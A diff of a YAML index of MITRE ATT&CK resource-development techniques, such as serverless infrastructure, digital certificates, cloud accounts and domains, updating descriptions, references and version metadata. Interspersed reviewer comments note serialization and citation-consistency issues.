- Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+ Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -52193,15 +52872,18 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.007:
technique:
- modified: '2024-04-15T23:49:14.558Z'
+ modified: '2024-09-12T19:18:36.583Z'
name: Artificial Intelligence
description: |
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
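Review bot: the `url` of the new `GWS Apps Script Abuse 2021` reference carries a trailing `#google_vignette` fragment, which is the ad-interstitial anchor the site appends to the address bar rather than part of the article location; strip it so the stored reference is `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. The `x_mitre_attack_spec_version` bump from `2.1.0` to `3.2.0` for T1583.007 in the same hunk is consistent with the `'1.1'` version bump above.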
@@ -52233,17 +52915,16 @@ resource-development:
url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
- source_name: OpenAI-CTI
description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
- by state-affiliated threat actors. Retrieved March 11, 2024.
- url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+ by state-affiliated threat actors. Retrieved September 12, 2024.
+ url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.008:
technique:
- modified: '2024-04-19T12:24:40.659Z'
+ modified: '2024-10-15T15:10:59.530Z'
name: Network Devices
description: |-
Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -52296,11 +52977,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -52336,7 +53016,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -52385,43 +53065,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
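Review bot: the 28-line removal of T1588.004's `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` is a move, not a deletion (the following hunk re-adds them in the new key order with all four references present), but the move hides a content change: the `Recorded Future Beacon Certificates` URL goes from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers` with a new retrieved date. Worth calling out in the commit message, since a reviewer skimming a reorder diff will not see it.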
@@ -52434,18 +53083,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
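Review bot: T1588.004 now uses the `modified`-first layout (with `revoked: false`, `x_mitre_deprecated: false` and `external_references` near the end), while the very next object, T1583.002, keeps `external_references` ahead of `modified` and `name`; mixing two serializations of the same schema in one file is a sign the generator was run from two different inputs, and it makes future diffs of this file noisy. Normalising key order for all objects in one pass would be preferable to this partial conversion.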
@@ -52467,7 +53147,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -52483,8 +53163,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
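Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1583.002 outright rather than updating it, so the object is left without the key entirely, unlike T1018 and T1046 (which keep `3.1.0`) and T1583.007 (bumped to `3.2.0`). The same outright removal recurs for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003 below; if anything consumes this field, those eight objects should carry the current spec version instead.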
@@ -52506,7 +53184,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52526,8 +53204,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -52566,7 +53242,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52587,8 +53263,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -52618,7 +53292,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -52655,8 +53329,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -52678,7 +53350,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52700,8 +53372,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -52738,7 +53408,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -52760,8 +53430,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -52823,7 +53491,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -52845,7 +53512,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52863,8 +53530,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -52899,7 +53564,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52918,33 +53583,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
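Review bot: the rewritten description on the `+` line introduces two new citation tags, (Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) and (Citation: Netcraft SendGrid 2024), so this hunk is only consistent if `external_references` entries with byte-identical `source_name` values exist; the following hunk adds both, so keep the tag text and the `source_name` strings in sync if either is edited again. The bump of `x_mitre_version` to '1.1' is the right signal for a content change, but the rest of this hunk (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique`, `x_mitre_platforms` moved with unchanged values) is key reordering that makes a one-sentence edit read like a rewrite of the object. If this file is regenerated from the upstream ATT&CK STIX bundle, state that in the commit message so reviewers can skip the ordering noise.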
@@ -52954,10 +53617,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -52965,9 +53637,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
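Review bot: `spec_version: '2.1'` is removed from this object, and the same removal is applied to every technique object in the rest of this diff, while `x_mitre_attack_spec_version` is raised to 3.2.0. `spec_version` is a required common property on every STIX 2.1 object, so a consumer that validates these technique blocks as STIX objects rather than only reading the Atomic index fields will now reject them. Confirm that the index generator and anything downstream only consume the ATT&CK fields, or keep `spec_version` in the serialized output.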
@@ -53018,11 +53689,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53035,7 +53705,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53070,22 +53740,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
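Review bot: the added Route53 paragraph in the Domains description cites (Citation: Invictus IR DangerDev 2024), which needs a matching `source_name` entry under `external_references` (a later hunk adds one; keep the two strings identical). Because this description is a `|-` literal block, the two inserted blank lines are preserved as paragraph breaks, which is the intended effect but differs from other descriptions in this file that keep paragraphs on consecutive lines (the 'Upload Malware' description above, for example). Note also that the new paragraph describes in-environment activity (registering a domain and hosted zones from a compromised AWS account), yet no hunk in this diff touches `x_mitre_detection` for T1583.001; consider mentioning the provider's domain-registration and hosted-zone API logs there, since the listed data sources ('Domain Name: Domain Registration', 'Domain Name: Passive DNS') only cover external observation.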
@@ -53106,7 +53779,7 @@ resource-development:
